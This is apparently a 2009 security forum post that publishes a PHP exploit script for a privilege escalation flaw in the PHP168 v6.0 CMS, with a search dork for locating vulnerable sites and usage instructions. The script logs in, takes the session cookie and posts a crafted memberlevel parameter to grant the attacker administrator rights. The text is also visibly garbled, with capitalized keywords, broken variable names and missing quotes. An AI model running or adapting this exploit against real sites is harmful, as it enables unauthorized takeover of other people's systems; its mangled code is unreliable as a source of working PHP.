By Ryat
Http://www.wolvez.org
2009-07-17
I went to work every day. I haven't posted a post on the forum for a long time...
Previously, I sent a php168 v2008 permission escalation vulnerability. This vulnerability also exists in the same code segment.
The exp is provided directly, and some details are interesting. If you are interested, you can analyze them by yourself :)
EXP:
#! /Usr/bin/php
<? Php
Print_r (
+ --------------------------------------------------------------------------- +
Php168 v6.0 update user access exploit
By puret_t
Mail: puretot at gmail dot com
Team: http://www.wolvez.org
Dork: "Powered by PHP168 V6.0"
+ --------------------------------------------------------------------------- +
);
/**
* Works regardless of php. ini settings
*/
If ($ argc <5 ){
Print_r (
+ --------------------------------------------------------------------------- +
Usage: php. $ argv [0]. host path user pass
Host: target server (ip/hostname)
Path: path to php168
User: login username
Pass: login password
Example:
Php. $ argv [0]. localhost/php168/ryat 123456
+ --------------------------------------------------------------------------- +
);
Exit;
}
Error_reporting (7 );
Ini_set (max_execution_time, 0 );
$ Host = $ argv [1];
$ Path = $ argv [2];
$ User = $ argv [3];
$ Pass = $ argv [4];
$ Resp = send ();
Preg_match (/Set-Cookie: s (passport = ([0-9] {1, 4}) % 09 [a-zA-Z0-9 %] +)/, $ resp, $ cookie );
If ($ cookie)
If (strpos (send (), puret_t )! = False)
Exit ("Expoilt Success! You Are Admin Now! ");
Else
Exit ("Exploit Failed! ");
Else
Exit ("Exploit Failed! ");
Function rands ($ length = 8)
{
$ Hash =;
$ Chars = ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz;
$ Max = strlen ($ chars)-1;
Mt_srand (double) microtime () * 1000000 );
For ($ I = 0; $ I <$ length; $ I ++)
$ Hash. = $ chars [mt_rand (0, $ max)];
Return $ hash;
}
Function send ()
{
Global $ host, $ path, $ user, $ pass, $ cookie;
If ($ cookie ){
$ Cookie [1]. =; USR =. rands (). "31 ";
$ Cmd = memberlevel [8] = 1 & memberlevel [9] = 1 & memberlevel [3, introduce % 3d0x70751_5745f74] =-1;
$ Message = "POST". $ path. "member/homepage. php? Uid = $ cookie [2] HTTP/1.1 ";
$ Message. = "Accept :*/*";
$ Message. = "Accept-Language: zh-cn ";
$ Message. = "Content-Type: application/x-www-form-urlencoded ";
$ Message. = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1 )";
$ Message. = "Host: $ host ";
$ Message. = "Content-Length:". strlen ($ cmd )."";
$ Message. = "Connection: Close ";
$ Message. = "Cookie:". $ cookie [1]. "";
$ Message. = $ cmd;
} Else {
$ Cmd = "username = $ user & password = $ pass & step = 2 ";
$ Message = "POST". $ path. "do/login. php HTTP/1.1 ";
$ Message. = "Accept :*/*";
$ Message. = "Accept-Language: zh-cn ";
$ Message. = "Content-Type: application/x-www-form-urlencoded ";
$ Message. = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1 )";
$ Message. = "Host: $ host ";
$ Message. = "Content-Length:". strlen ($ cmd )."";
$ Message. = "Connection: Close ";
$ Message. = $ cmd;
}
$ Fp = fsockopen ($ host, 80 );
Fputs ($ fp, $ message );
$ Resp =;
While ($ fp &&! Feof ($ fp ))
$ Resp. = fread ($ fp, 1024 );
Return $ resp;
}
?>